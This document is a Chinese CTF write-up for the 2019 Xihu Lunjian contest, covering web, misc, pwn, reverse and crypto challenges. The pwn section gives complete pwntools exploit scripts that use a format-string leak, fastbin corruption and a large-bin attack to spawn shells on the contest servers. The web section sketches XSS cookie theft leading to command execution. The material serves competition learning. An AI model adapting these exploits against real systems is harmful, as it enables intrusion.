西湖论剑2019 WriteUp

Web

Web1 猜猜flag是什么

扫描目录,得到.DS_Store文件,使用 https://github.com/lijiejie/ds_store_exp进行还原

在目录e10adc3949ba59abbe56e057f20f883e/下发现.git文件泄漏。使用Githack还原后,得到几个文件,其中zip的hint有密码,使用已知明文攻击还原hint:

文件内容是:

将code带入首页,会得到一串数字:

使用php_mt_seed:

得到flag:

Web2 BreakOut

留言内容处可以触发XSS,存在过滤,payload为:

在onerror后换行即可绕过过滤。将该链接,即: http://xxxx/main.php 通过report报告给admin,便能触发xss,获得admin的cookie,便能进行登录,在exec.php处直接执行命令即可:

便能获得flag:

Web3 babyt3

根据hit到dir.php,通过GET传入目录,看到flag名,include flag名就可以了,题目出现了很严重的bug。

Web4 blog

原题:https://ctftime.org/writeup/10369

同年Google CTF另外的几个题目:

https://otakekumi.github.io/2018/07/04/GoogleCTF-2018-Writeup-JsSafe-Translate-catChat-gCalc/

Misc

Misc1 最短的路

应该是一个BFS算法题,然而就这么点边,手撸也行。。。

flag{E3EvelynJeffersonE9FloraPrice75D}

Misc2 奇怪的TTL字段

看ttl.txt,发现只有四种ttl:63 127 191 255,猜测是相当于00 01 10 11

转换后解两次Hex,得到一张JPG图片,是部分二维码

用Stegsolve发现有6个Frame,拼起来得到完整的二维码

扫描一下得到密文和密钥,Vigenere解出来前面是Flag,然而不对

爆破最后两个字母,发现ee对了。。。

Pwn

Pwn1 story

from pwn import *
#p= process('story')
p=remote('ctf2.linkedbyx.com',10895)
libc = ELF('./libc-2.23.so')
raw_input()
p.sendline("%15$p%25$p")
p.recvuntil("0x")

canary = int(p.recvuntil("0x")[:-2],16)
info("canary:0x%x",canary)
addr = int(p.recvuntil('\n')[:-1],16)
libc_base = addr - libc.symbols['__libc_start_main']-0xf0
info("libc:0x%x",libc_base)
one = libc_base+0xf1147
pay = (0x808-0x780)*'\x00'+p64(canary)+p64(0)+p64(one)+'\x00'*400
p.recvuntil('story')
p.sendline('200')
p.recvuntil('story')
p.sendline(pay)
p.interactive()

Pwn2 noinfoleak

from pwn import *
#p=process('./noinfoleak')
libc = ELF('./libc-2.23.so')
p=remote('ctf1.linkedbyx.com',10426)
def add(size,mes):
  p.recvuntil('>')
  p.sendline('1')
  p.recvuntil('>')
  p.sendline(str(size))
  p.recvuntil('>')
  p.send(mes)

def dele(idx):
  p.recvuntil('>')
  p.sendline('2')
  p.recvuntil('>')
  p.sendline(str(idx))
def edit(idx,mes):
  p.recvuntil('>')
  p.sendline('3')
  p.recvuntil('>')
  p.sendline(str(idx))
  p.recvuntil('>')
  p.send(mes)

add(0x60,p64(0x71)*4)
add(0x60,p64(0x71)*4)
add(0x60,p64(0x71)*4)
dele(0)
dele(1)
edit(1,'\x10')
add(0x60,p64(0x71)*4)
add(0x60,p64(0x71)*4)
add(0x50,'aaa')
add(0x50,'bbb')
edit(0,p64(0)+p64(0xd1))
dele(4)
a = 0x46# int(raw_input("a"),16)
edit(0,p64(0)+p64(0x71)+'\x5d'+chr(a))
dele(1)
dele(2)
edit(2,'\x10')
add(0x60,'a')
add(0x60,'\x00')
add(0x60,'\x00')
dele(5)
dele(6)
edit(6,p64(0x601120))
add(0x50,'/bin/sh\x00')
add(0x50,'\x20')
edit(9,p64(0xfbad3c80)+p64(0)*3+p8(0))
p.send('\n')
p.recv(24)
addr = u64(p.recv(6).ljust(8,'\x00'))
libc_base = addr - (0x7fb4e88cf6e0-0x7fb4e850c000)
info("libc:0x%x",libc_base)
system = libc_base+libc.symbols['system']
edit(11,p64(0x601018))
edit(9,p64(system))
dele(10)

p.interactive()

Pwn3 Storm Note

from pwn import *
#p=process('./storm')
p=remote('ctf1.linkedbyx.com',10444)
#port:10444
def add(size):
  p.recvuntil('Choice')
  p.sendline('1')
  p.recvuntil('?')
  p.sendline(str(size))
  
def edit(idx,mes):
  p.recvuntil('Choice')
  p.sendline('2')
  p.recvuntil('?')
  p.sendline(str(idx))
  p.recvuntil('Content')
  p.send(mes)

def dele(idx):
  p.recvuntil('Choice')
  p.sendline('3')
  p.recvuntil('?')
  p.sendline(str(idx))

add(0x18)     #0
add(0x508)    #1
add(0x18)     #2
edit(1, 'h'*0x4f0 + p64(0x500))   #set fake prev_size

add(0x18)     #3
add(0x508)    #4
add(0x18)     #5
edit(4, 'h'*0x4f0 + p64(0x500))   #set fake prev_size
add(0x18)     #6

dele(1)
edit(0, 'h'*(0x18))    #off-by-one
add(0x18)     #1
add(0x4d8)    #7
dele(1)
dele(2)         #backward consolidate
add(0x38)     #1
add(0x4e8)    #2

dele(4)
edit(3, 'h'*(0x18))    #off-by-one
add(0x18)     #4
add(0x4d8)    #8
dele(4)
dele(5)         #backward consolidate
add(0x48)     #4

dele(2)
add(0x4e8)    #2
dele(2)
storage = 0xabcd0100
fake_chunk = storage - 0x20

p1 = p64(0)*2 + p64(0) + p64(0x4f1) #size
p1 += p64(0) + p64(fake_chunk)      #bk
edit(7, p1)

p2 = p64(0)*4 + p64(0) + p64(0x4e1) #size
p2 += p64(0) + p64(fake_chunk+8)    #bk, for creating the "bk" of the faked chunk to avoid crashing when unlinking from unsorted bin
p2 += p64(0) + p64(fake_chunk-0x18-5)   #bk_nextsize, for creating the "size" of the faked chunk, using misalignment tricks
edit(8, p2)
add(0x48)
edit(2,p64(0)*8)

p.sendline('666')
p.send('\x00'*0x30)
'''
add(0x100-8)
add(0x200)
add(0x100)

edit(1,(p64(0x200)+p64(0x100))*32)
dele(1)
edit(0,'a'*(0x100-8))
add(0x100)
add(0x60)
dele(1)
dele(2)
add(0x100)
add(0x60)
'''
p.interactive()

Reverse

Re1 Junk_Instruction

这是一个MFC逆向,用XSpy得到点击事件函数在2420

check函数在2600

长度要为38

中间有大量跳来跳去的花指令,然后发现是一个异或

用调试器提取出来异或的东西

flag{}应该是不校验的

a = [0x33] * 7 + [0x32] * 10 + [0x31] * 10 + [0x30] * 5
b = [0x0E, 0xD7, 0xD6, 0x25, 0x9E, 0xDD, 0x4E, 0x7B, 0x69,
  0x34, 0xCB, 0x14, 0x9B, 0x7B, 0xFA, 0xF9, 0xDB, 0x75, 0x62,
  0xE7, 0xF5, 0xB5, 0xDE, 0x57, 0x82, 0xCF, 0x0A, 0x08, 0x9D,
  0xD3, 0x42, 0xf3]

key = [a[i] ^ b[i] for i in xrange(32)]

cipher = [0x5B, 0xD6, 0xD0, 0x26, 0xC8, 0xDD, 0x19,
  0x7E, 0x6E, 0x3E, 0xCB, 0x16, 0x91, 0x7D, 0xFF, 0xAF, 0xDD,
  0x76, 0x64, 0xB0, 0xF7, 0xE5, 0x89, 0x57, 0x82, 0x9F, 0x0C,
  0x00, 0x9E, 0xD0, 0x45, 0xFA]

flag = [key[i] ^ cipher[i] for i in xrange(32)]

print ''.join(map(chr, flag))[::-1]

Re2 easyCpp

输入过两个变换:

- 其他所有的数加上最后一个

- 顺序整个反过来,最后一个不变

最后要变成一个斐波那契数列1 1 2 3 5 ... 987,可以得输入

-377
-610
-754
-843
-898
-932
-953
-966
-974
-979
-982
-984
-985
-986
-986
987

得到Flag:flag{987-377-843-953-979-985}

Re3 Testre

输入16字符的Flag,要变成

D9cS9N9iHjMLTdA8YSMRMp

变换规则:

首先把Flag和fake_secret_makes_you_annoyed这个东西轮异或,再加一下,然而这个并没有用到

是做了一个类似于进制转换的操作,把64进制变成58进制

然后把它编个码,实际上就是个Base58

逆向计算算法

from Crypto.Util.number import long_to_bytes
cipher = 'D9cS9N9iHjMLTdA8YSMRMp'
charset = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
flag = ''

for i in cipher:
  flag += chr(charset.index(i))

res = 0
for x in flag:
  res = res * 58 + ord(x)

fff = long_to_bytes(res)

print fff

Crypto

Crypto1 HardGame

有3个加密,一个一个逆

Flag1:

e = 2且密文很小,直接开根号得到

flag1{Th1s_i5_wHat_You_ne3d_FirsT}

Flag2:

DES加密了很多很多的明文,且密钥是8字节的大写字母,并且使用了PKCS5Padding,根据概率发现最后8字节出现频率最高的很有可能是一整组Padding,即0808080808080808,使用Hashcat爆破

ea9c3c12181a1e82:0808080808080808

得到密钥

JFRYOMPR

解密得Flag

flag2{Fuck_Y0u_cAn_Ge7_Se3ond}

Flag1 * Flag2 * Flag:

是一个类似于CBC的加密模式,不过是用的RSA,每4位十六进制一组,考虑爆破。。。

from Crypto.Util.number import *
from Crypto.Util.strxor import strxor
n=0x834b44a67ea419e1c3e665cedf7790ebc5fb013e2304861b667232e7ec1cae53eb253639b348a6702561671a5c5c9105eacd5d48de51427fc49f22ed2d9b60f98c50713ac95f2ac324fa58b90e0c07ab688becb771d92224be68474586376a4cd9a0ea96d5584184cbb7ad3889fd6c1a4ae3791e67a4ee6f220491abbbda2006addc6032999238cc010df759c868485522ee17e520569b7e746b0c770065f4622894afcfd46257b7c3646f15d65d561ab8e22e4f03cfbfa53ec4109115feeced84c398286bb79c58a7d640a2faec2c50285558d6b11d8ebc25eae6ece9c418dd795c0c11f459c815582c059935028cafb09b6603cc44a48f3823d0aeda73fec7
e=0x9ae923
cipher = 'L+HK7Ksu+PoVJZBnIriWufZgKFH1APFFLFnKIf7OFjlBHRAkUtWaVp6y720Aux7f+ed+4rBIzsF7F+TwQAT+pOil825ftEJCTL+CUBgwq8C24EO4hBvj2VhSMtuZOYyOxZNNrnFdi1ODkAWbpBRDADNp8kO6OC4WIpEZ30Jlvar8rEZcHTnB0dfnz06lSz4RZtdd7cf0lv6Hgh6UQY8zWoNjjA/pnXmudfPTDmGv6AU3f5UzwalQLuSKr3Hh3XItdsclgJMp/DTdXJrz4DzEX5L3cSBskLz5oaloRSjn0mV9GSMUnhCF7VFCzGkpFl9ImYF/iZNl6w9Q8fzY4fyQ7xqwBnFl8HkQEtbj846T9WZh8oRZ/8nEsIL0m0sh32CV2o9I0R74iTOZvd0sGLfHF9G5/FAyWT0g+y5Gkpwi48zs9rAVIdzoDqq1wztnBqlsMyPcRFjDPQaRg0s7Xf8gayTeuUN4GXuLRKDzULfdrZkK5XDhuDmRdaCyMnVj+SzYkIIo8qiwA56y/4GGi7KFztMPShBL9Lt6wNzHaHItYu2I41sgENyndVEO/K5sC5B2z5HtNTMkt71cti+gO3VO4lv/tFKKWoV5/p/zKGhz8If+XDHtZmFHM35jCpvTIn3uHTanu2d8oxTlboukpsDiHEK0CrGWW1TtB+MnxvTS/PgBt82BKWulSVQ+M3F0Zf13GF2XgM2Y+LtaPI4iD/8NF3ZNGdY1IsTwgGqRvWw5ZkjSEl1Dl1aLMmoeqCl4lCiTnasHwDv9SY3DYdHg72sQFhEapV73CgxttEjQI1pAtmybDfQwIl0hXBrtdovISO0G4UxWdTEBJNQGFpJcA0LFpgD17zMBg7N10ZaEotrbG5ELBYIqFWAOQWKBvw/kS+Mgfs0ng0b9EJfUl0y6tZhdV7Vnh+9G/ZkEAQXzZJLwEP6Dez+5XdY+G/b/fpKDSO9vSpcRIQQk/3qjAbH4W9Pe32xL22NO8vMS/igg0XtBodV9F2Nlqv9JjIpZK6/XFp69CNDZdHvL13gRCXeQLYL1qFOMjOppLSa9Exnjyjknoqhx74TxzmtMaJyUJI2vKz6ND+AKxsgTrqs/vWUAgDyGDKNPauJrpkhPrZWVIcZVdo0NLgxBXUXXAgEiYp/znogwZ8x6EWLZDqmFQP9SIHtR84qAgp2Q9maz1wqI5ANWgA48iiPVihbUfWiHtzPYFrlPs+nSWQUql6M5dBgIpaDISthjWSy3R+pvczKEaws9eQAgT4MZD7fOkNjt8Nvi9dRv0ocHhhxjtb4yazOm587wo8voCUFjRo5crNOlTfLWc4skXDELKzBLKgNWAPIjMOuSVSCQ40ORn7qzuvnKtL77KxgCX3sesainu0TWcfFjkkP74Bs5la1FKSVYSPX17xi4YV56I92AaBYjOS8CxDLVKIcudPYmVQM65oVqf1f0ilS0LRvJEBJjquR0vLE9NI97sxsgl7NnU6VifGZ35b6nZhmhMPk7rXhCFUiamTdSJ8313mwlyGU1S4gMo4cyechlJ2Oqok1Ew5TBifT6Xi1Fa+hMF9mPUEbglbHZPRTCrRUkoa30aXE8lcKaGpR+5JnUoVgOP4Q44kWA8i5RDHk1uvdzI8Ehr9LQIBoZO0K64zsCZ6SnN5o3FIz4jOyXfJVCYJ2NZKjsw8kgG3rl34BUsxbxsvvZTEqVp8t/Mqb7eOQZxLMQbeJhe78KtcJUjVK4EU+gZzzE478/Ekk86Qb/B7qyfO5EhQAb4PsqNMfih9BVBmDFfxEHfr8ZKH714ujX8USv6/Ug6K8pEwfpoftQcnZ4Mr1A1M7ns1j60JswuEeuK3vvu8TfT15E0oxcmmC7IsmdD8Br/8p6iBmH6OMp83/VCY5pe3swu+I392Ww8PYyNrZk56oXf8/fV3TODyKFoBGEdAC+DZYWqFB8Q7/bclVuv6d7hovmAtKdMGcoTcWxz4t0DmYCN8vyypTOHsnzIVQJ2ZGcZbyc1RptNXuGb9J6ISWgc1gJr30Rqv8BpXzmLiFUzj5SZPn0HrjOPOmXYIH1C//05ZRHqvGd5ja6i0/SkwTYG8EFdMJ91edESulXY8cB4NPyJY1M2dZYpjxaxjO81t0Gn6OATDAl7h4iAQ3aKMF+EvYhN8i/ceW4gR4zLaJgLsiZWyRybaM/JDvklrNLXHY/xkXo34La/QPNzXHSApRQw42N4StJTjjOGl2KGldcCi/0Sp5ynPPlz2oettFDMcX87/UCTqFAaXEpZODOsLf7FyPBbEdYP+0mWr6MHy3VHP2HHjRPjlH/mpZyPZyeJ1A5O9J+wRFckIgTLKZHp7wyx6U1YRnQyqTAyZKvIeJY6/hPk0FSZklRJhTpd5xZbICthYfYM6bOky1ZpD48lrF8EnzGws1IGvr7GPubitcQZlpF2PVtu1EdSI0fqx3SKq9Mewtm3hhcKJwcqdtLaB2Yew8j3ikI0l0mAUYprcGvop6mR6Um03lFgBYpgVk27J3cDlCMTd0x5FbpNyMs8wP6N5BviLFSI+dYM8UbLw90AUnh/x/PIhGkHTB5FrXq5xpRtiEX9Jtsp5mHxWbLD93gD9TYRi6DH25SDtgRt1cjC1X5GX8ovgHPSilnwxJmzdUrYdAwpOcOu1lmxZM0zQgrvapL/xC3vSuV1E0DiPWJPXgbDOEcuTpUU0dh3485DgSykrttSm0PagyJntv5JwNATaxIeFMzY+hGX+QAtKUknOIdgx9VOMM3j9liWgoS/wOLG6+QxRpGGwSAcfsc/HbHuWHnc1rC3ZRebRCgYqieQubk2llr5RUPXhSdyiND4t7DZRmwkuK1FXV6DVBYp/AZZcVlUNLXLeHOvGoFUJ1dFf4a1zKMf8bMssR4+Hq8F3gUUPznYTAsesJGsyH/ehdkvksAwDgjOPsdfpNbpjw63ifdRTdJTL1OJhQlFwFwxOXUdHtIy11GtOxJEDNZ/od9U9O2uPJN/WApaa+1whAM5RQInLuqlYOrAdorw+fkK5gO5JN0pxZgZcg1cyHw5NyzDOc92GCSQPjFJ6O8oC26U6NDFlnj5Sj07uWkP9pu2Hczz5kyQtfoA9aN2OpTSM06WTzDbZLt0kVbBloA4Xhd9VE6bLh9gDSSXvNEEgejceEbWpSIRxVFIPXd6MSkfv0BjBAyo8iNHRUpMuRow3ZYb/uKhql3ocXzRa0ELllBMlTrMCJjbWouGvtaleRaPmnDpEKZrIFvoBs63i+IV5FKqnMCT81fDMw/EHw4Rinkgz70lrupwHv68VJdITVsCwEYUGJWWf8HrbLDQTIJjEP5ZShaDuY2rjASi0ApdBx5zC5bWLv15FWnslS3M+9HUlSEHUjC7gOeZxfjrucQ/f2RJ7QMyyqLNBfQDT19uwrb+KfzJtO6Fr8O9e33dm4hEj3QBPcLFwGN1kFOfKU9nvXISC2OdqPaBu1w0PgKOm+gUQbK9FM+lo3+a8N92Pjq3H8WDtYpEYHNGQdiLi7KddInzbwNDsxKHsYroU+tnus2v/+W7p9PdDHOXynnq6C2qu9cPw4fOT89Ae516D4QSwRanNbQX7QMCa3t0Q2f+RjBSpZWlH8gRO6Yzb05IBvMY6NyzG/w58AZ/bpo2+RrSLzQXL47icevjzzHTnu4DuRWSOZkWPmL9YiRN9bRejIWCk5m0c6wGbgglR5dlInc2u+gM/9YiPJTu4ebuN5vUqg0NMXVa2wdeH2uUKnxFROxkVnA3jpPe0oKrUKmLT9unJgW5+mSc1s8ASxQBaov+S4mxLK05oxjBM5PkXmvV23dx3MIQqyl+rsXD22Sq74SOD8Is8b+nyqispyzgV9yGHDf9s6NZT5bf+9FWorVwA1NJ2s2xBTDhuv0pK3+EBb0ichGFMOTLQD9OaxfITycumuiMATRNLckiJHqCrENwNld0oojtHmWw76z23jG+jHOMSRtZaA0f7KdFHBVwfqIImgyRyRtJlLL8ioE5ApvU/jfRcdH2gihGeu+h1/fTSp4IHaYKMB9ebjLPrHhTGxlXPL5HlKWQmjMJ6t5qokJNnfQqeU2e3CL8yJhkwJWe0i+eN9rBc3/6vFeQ/gNYcSRQJSndc442YPlX/msd0rHYcErfRiG5VoiRYEDb00O4SPOQH2LiXnrncex8OYBGHoTjfgugyg87EJ9meS4MX4u9LIx3DD2nCH1m/keXZNILq8X8BF+LARKsCsuuU1o2FWTjFqV7iDIAr38kN4G71uM49r/xZHFu6FxGKjawUj9/GvZX+oTxogvp3C34ZHQlS2eyY/b7aLnI4eC4VXev6h9vAgN8mhhpX5AyFQhguzMlwrJtI2cimI7LYPeaC9oJ0FK61NdaiANQgg3pEq27tmaape7784gFtNw8JY6/Xi5Fu8W2Jgh37YH39JbixuZjVs4iqLBBGukkCntYflTTZfV1jkG2cBuSb9cf0KqPZWyXeY0tVEGTAcs3U/HKwzP8YhbQWO1oZBcjMMl2i+z4WQO2JjmmPsXYnrW8Mj5daGTJrCLq6UUoCiscyYHf1C+3aoGbmITj+MFVAmQUQVmZazC6r+FsO86rCemf8LrDYw/nOBA4PK8XHgH+6/lqbkT9gDvtuIBvkrLgHdpxHP7LAiS9qM5KGCfILZTUMUSpKHESoQWcsA0qkOnPjS1EgcMgXHTq4dZRpAOKcEQ50KnGbB20zJZd0nZHxd5LRliIAjJrM3STfesFeniduCaWXU6Xy5JgoB9r5gEy+A3i39HFxnGmfAPf5e3nCP3in++h2u32HsU1i3YMwQwyD0p1rP1XasvAnQXvGIKvWztoebGM1NQy/DUE9tnudJzdC2tmP21D1KFnPNkNIq32GeqZeeokgp5vvmYf+Ur9UKz0iutWNJewtfpor4ZYfeCtHSkdCYeoR3L26Y4poNlRmCjEhbul7rZytPIvh6+tLVYRg96farYUN9CUdQutv/cogwyyiTivknNokWBxIvrYbNkz+KwZxYpE0/c62CnzzifRS924tpbywtjYuq0vk4TFmyaB2Zwf0HyBKxuJy5QWDz6MM9a8WjrxdM7LgFyehSeL2h47dgtUUkaxNZpCDwxh3zmPWOH+Nw7E1CoRCwrVYqOOWO+YthlDT2T4OsOnSryfOBx30DunpSgNrGjqvVYb7lVkzS5hsacLuKNezfAqUv1H3YxLRYkFHeFhFh5KzsMKuSZIMR6v1vZDQEByi0if46F/8G4D3D9V2NvZ36LfETBIxFs+VY6XKkVV/6I4R8tTBvtDvMc+JjAP1VyngcX7nMt1/gStQkA30pZ5C95uHB+M+opS4IBNioVAzofo2Qp8C465/P2LHfeSFrI9QPXwGRR8hh4ZFwtcRhS0h2k5gUP0aILe/Sppey7jxzYe28ex6YOwllZv5zaOum+VryiZzu0hZDqfBh9u4adKfis47IKExnvU0dRNrDuo2R84hiaxehWTjuXhzNloYNHsxp4BBwDnqrGX1ZhwLOebwGoO8b7HkNKYoHQ6Rh6E4me1J6d9f/rA1qr4vorZfgVTMzRs1imNAo4WX4IzUS1ojbffAc/YEJDdoYzn0rP3+vwtTMpx1RNmO8yxfYXAHs9cAuAn+Iz3vJDLp2ByZjUiF03+VRl3x6rZ9TPZmub2NE/vsx8lJNVZA93PtX5TFYUMAFms5BGlzqPd8KD54W58MjhqfRwluuNXsVnVW9qfiAC7+F/Wd8ZXy6UnMyaAV0fnkuqH+Vcc6PGG4UoGfTSMF/nbTq28Hukp7mj3QYP3+gag6OCo5jZbCONIXRa3XHNlmiv/aKL1rlHx0oczZAScdI+XzqruzPEs5mlDRIaqGCPVVkPmgYmhXD+LAyQgAq3Etj7P/uQz77v3kdNiBwsx/E0C6LbHfsVXdaaBW3ntnM4UCYm770VF/x0gWKHPJ0z1pVvLVYFUIEnFc+hTvkQh8HEIcwWwAo+oR4LIY/THrviFLIEMIXZwO3frdzmiwI+/Rr6Ozq3Vfb2bobXhoTEyQT+RoxyS2yi2qhN626q9b8mip00xCgsWyLyhAKbrXy0G4kjLNQCjXO6bEtpUaGYrqWWKyMqXHmTmjSz28cYrPhu2zmtvjnxjV0kFTq+PIlILVz9QmwMH4TcAsOmW65bBOlUsGsDtiUnecUqR9stoxrL9ibyHWp7TvTyd0tlOaKqy3pJNP8Fxccib75XVMxX5R6DFLxGgoUkzEeUHYTLY8bNNMSK8Fam/JlDFWtd0vDYwNWP6Wdfc4DFkqQaJFoKvBnvJx4y2yhrbqcjvXbxni6ahFQRJOKx9gKbzO0wTLiat0w9z7ZmwUwp1tOnc0nbIFySRHnBDYH3p6PK2N6ywvqTef7TcmbitQCQ9dHm4e64tb+F6Yf3S0BaLW9bw4bLbnIwDOcF4G1w09TfBML/kcDoB0nnSt/PczlRcXMAH5ymmbPleC97gEESloof9SlPSFZwDYAip+Hck7N0m6Gbz5/MyHU68WB4fw01DzB6tXgixlalLRvICNKqMiOR48DOl/5NMyDwvhMjqqkf42jDKr1v74IaWHGI+5L5giPQzPfASf5r2ASFmNASfDE1OLmd1IVoZg0wz7j4jrSh3+FtRS7JcA0AtfAWufTiFTcCk/FgpiN2sOkxBMBjLIKcZusUenZE6qRXzb0LLGgdkBBxILryTTzl7uQ44pPM6VD2mc/RqBMjrbnVETtz3XA71uIh1jYQB6cXNxEgmrNXpPyw0l1i2t3JygMmdx39EPKFw1XxJsykxpaOUZDf24HPPbWFL6WCxuUm7CqqohZqBgXgRanIk/gQMCPbYb2QJp/llmLkrYGTKrBjB/wVAFcW73mPpN8p0o8eGbIP3gFPWOZ6sbcNPjs2gPFRM3OesxlUDtuHYNsBdqUsdYtqd6zcvvHFu4n1rrQK9k75QVGTTbH1OvxzsnkUJcMxaix7Na+gn1VlUVIf0JwEA4OYlnZlqMASc+CZjQA3vu6zLpxgqELnNH6VbSFtsgC8kIYwrUVAGRN8XuIsvtYgkyscBDwZJSQPJaYpZ5VJVXwduHprdjK5IWJJdP2FxlS9MLE0jZUWLSDSrCk23hRNHncmrQHcCWvPwDKFnNeQPj1tmCHm6UZR/g0c/opKZqldjl1q1F7ZZhEOiLeVyxxfMgt38n7X1JpSRFFxkxbw5hftY72cQuWSI1KA+o1ey59z3CUZq/qNSJ0gnyL5mPh63on4hVimIEyAa/nScx9vYgS469x0s+RhvSIrgSiFW/xjilNhBu+6P1uNW8mzv5i+/j/N7nRfJF/S0ldxW24sSbGJfsmlbGiznnVRYgsiG8Jb4FY5IJIzL9IkE+ctxvZJu8ZkWNM7MD5+pCTbGuIHJcVjd3ASbR8rYPmaNA0aXyBnLhtQQ1bWeaogcsvyXPgOIg3Nnmu7icOz9mUklfqf9kjAB9RxBDYN99AuNtKm/be+kD5WzTL8KyPjzdJjzXiDScORInlYQpUpyIcMcja+exZgJYWfl8OrKjr9PZqnlRPxOw/wHMMWdBdeyun8sqLxRflro0XQiruXRdWHryrx0djsRrhezZps4qZ3FuCHec+PbVWpvvWm/pM2aDtPGoGOxbfH4/ZRvp8FhZAImEUL4xhynB1zw45hyIh7KAgsNwh7vy20ktbSQKqQ5ZI/bck13qmWeG8VHHKuiZErm2XcYCsbP8b7DX8QUPTuCxCbQqirabVSc/zG1Er2azyPkM5lHCe7aw30NuzXkUWFdpzZI1ugi/FH1hlAy9TiDx/yFeQIRp/I7blPmAD5AAnumPyXo3eY6JtuVE5n9lZblzF4hBl7VTWk+TFuLrQKzby5Iq+bzSFhVcOUTQeTgpVFCGc+l8R6/tvTuq/sW4NOKvR6609d1h+iT3tkbAyGb9zs3Pmnu8dpjV7cfqptKdbrO0grk6SovFe81yFrtBUAbRNCzGPAI6hcV7tvtnRSLU+WmkxBY1/NYxZRdBspoGbhCYBAsZdJFgPLCYR2Ntvll5wUfRprN4DaU7c4PdHCmAqvRvURYROk/ffuB9nwczsox1Io0PnNXG0t0sPtffFY4JDMyxZNXw/1lP/tVn27t/VEVoYqF1SpZ/nYqVppczdROwQ0x2ZI5mSCeuqUpSVTV9sf6pW+ZOpwNJNsc2a6w8eV+om2aQbzyp6sm7KcgxLEf3w8p6Ysl4whzXL7jjXt7+Rbjc4BW/jf/6Bq5gNWcSAdOaxa/dWllaZKh8JxJ2j2f5w2zoY3+Nk6UjMyWfxOP6TitH0Ta/JTp1jxI2/3yMYG7eU9QxPNOhOPW5hVA0TjdywaYT/DNnjodPwYigftSdi9PQrUfWObZvMyO0I4DYnwzOnJc3HEP+CwIZ8zAGeHwFdnSq9SPfeCqfV5E/dKcRoSxDIBNDyoYLam7PDdaxC8Ok6mqvE4gC/9DwthN54LaK+sn1uFU3ArmesYKiLySUXCfNtaLy/qvd6XfFXIWIHZJmzZPShhvCOUGPOqMj8FDQNjKyteJl5ERA6L0IP0ZPTRedMUeJhn9Jr84WSW0p+XwJs/jUkg/vM6PsZdHl6bOgqf4OjHrw2j9pTqj2nlxKicbf3ujaH3W1eLvT2tM2TJJeVQyCRKWf8um9tyf+a0mrYx9BKpL2qcWDJ9d6mgre7zU3CbCMTHnC8MnV1UWfVN/x5aQoGyEyZ+WuqEh7wtfyC/8/mMid69HaYdFfnXWWNJAhwnR8Xn9KULChNS36MGN+tvSW8U5zXTWG1ze0roxynSeAF+0NY64wcJ+Dh9+rDNmab0msmZOVriIh8togUE4Wo1ftpj6DM4zko61SgBFpLx1yDzsmF4w4YeWzNxhVa+RHFPDQa50Kf34Nmfm1ilsVCjiBfDOnlwAKXnMLIagi1vc2Qq3m+CmQATUlN60dgLkroup4HCIVc3X/D8pQFI5esdLsrMBtOhcaSmN1UTlCXnFI6FguW9Ly1qKA8xQFDFzzfuJ7G/pLlTjRBPjGFNWqPGGXOxl26zLHT+qhQRRqFCtV0ZDObXiC7KrPWM2rvbKoKROlOR9MsscspcJT+oJ1U0yaemBKrkjJYjoQ3eFBcTLMMMmhjyNQ4IgCiVu2H7dy3CO2tT/XcWpuCSX1PMF6LeSHqFMM4jaAJCEsT2pnKDlA2e5gyWWPrjywU7SJnpsm8AHmK2KsD98kGbM7wNu+I+2hO8mcqLsRqxfQQ3iEdCS1slNi/HHMA5Wy8dD6ZrhYsQioyj7IGOITENhobKWCqugskPcvtbAqws9pJz6LkrvItFtZ2CNcN20Tp53igWaTjl3PbN9W0iO/Vwxgv6AFM9z35M7fnyvEqWKEVKlgXJ6eAsWH6Mq9XH0hs4FBTr/cX6WufZGpgdmFx2f1V85X+cbCKLO6ovw3opH+wbzOradYNUPc8qYzKfaOXGfAou/Vn6m1CEYP2i4upMPYJ+iMM5nxLRem5ymT9/YsELXFmbf2gHF9xHmCyDxUV7WlNlzdbvX9HUSOOsVA9w+eFNJjFdSuLLXVlv5/zL5CMphm32UN9zKYW1DVQA/LicLBN2dGgaygkWnckAfSiPdsFzXJRk4Y9LYZE/+b7hLnRLHk9lTJvkzbg7P3qGNz6FpPcsFkOD1cfzvjwp0Kz/9kTi7rGLuxfDVUy5TuNuMuEBeW+XShtcLZvZqmcDBsTLnsqbF0L72XjQNDpg8qIyYXNqGfWW4JJnwB8WCQEXRhlISorTToOcGCVudueda85oJf2/NjD4lrSh8BAm07n4tbsQoogCOC6d86aJZA1nKQ444wmk53+CX4L/fDykk7x/qQgy8BBKT95d/W4dZht5bOxxl1tVrr4G4ocIN6Xvvxj5/+iMhbFo5jjbHbTo1rZUCy3zfXyS8IEFbSDee4dMKhqQ5Al9H15+SJsdlA/WEkiYTh4/U9AKp9GphlU0xlUuVjj9TNYCAcydP82brzlA1eaj1PhINEewMj9wlLPy7xVj9npwuSKnkiQPD4DvynbsvMg8oh9AUwZfaPiGOxhYE8YNolavQJy62jinFBhFnJz7/puTQJ/3Fn8G/CuL/pGeVvKHGA1B3RhorERYOhxmmleVs2O8AV2iM0FE0w/Ai9Ax031/VeJMZaLTyaVfkx75j8WktEzf2rTffsLEJJ0eEZs84FlebpQ2/MaZG9o2XHnZTssMttwYXjq+xyO0UI7qEfCOjexx33JuTIdaSPgKFUSDdS6ejS0Wl5UkEqxIuameI1pXXOzYgHoD2qI/wcS0HoZPUY+nhToZq7CdPwQ7aXNhxQ4J6mhIYn9pGO+cnfNqSUSKAWskNETKvLBYJTw1hzb3BoSWmQj8OGAydBax31OKXcevIvwft6StGfk/gcMfx3ooPioAFL4xfnC/N4UsZrlZE4rQ+yqQEapt8dyvidIlS2Nl/zsJwSiRiye8Fi94k1S3gryomcyr76r1az2xl1fEgk2KZrpQboCFluxHPGR3n6jMUrhWOL59ScA6N9aGI9vpxW/pqJdk9RYQYByWHN3iG/6Mg/yskhdY7EffRjrVipGC28ZSXfVQJfDHmZDOSjZlvaFXX63x0BiuTYFO/Z26DPVxWvninoK9GLLjusdbb+5vsa27LN36xELbW4YtQ1U+uZAHr9V7aQ914adXNmIjMBg+7ri8OCtMNzfzowidN/HL+MNsGh6VZB9cMUIcRK063jmJFzJ16uW8vlITrn/0JM6GGAIHwaR9WXLcVeqacyPKaJKVucInaLATiptOvdUT7/qYx1zJ/HgbCZOrKaPxhC36moUe/X4IdYJY8nBAm8nbYwatbAqRZTorwbHYq8bWNMXWCjsF7d1SfwhCFqh/SKSN7BgmiruP8vJwzO0v7b423io9d9cFmE4Ti3NlNyDaAX4CuynuXPkxB7AJcOYjceopR4pl8SQzrg7CyF7I/7X1b/wu4fUoFzwb5smgr3JBG8MCo7f9+dunJZufBQIp55mPb88Z9qGB3A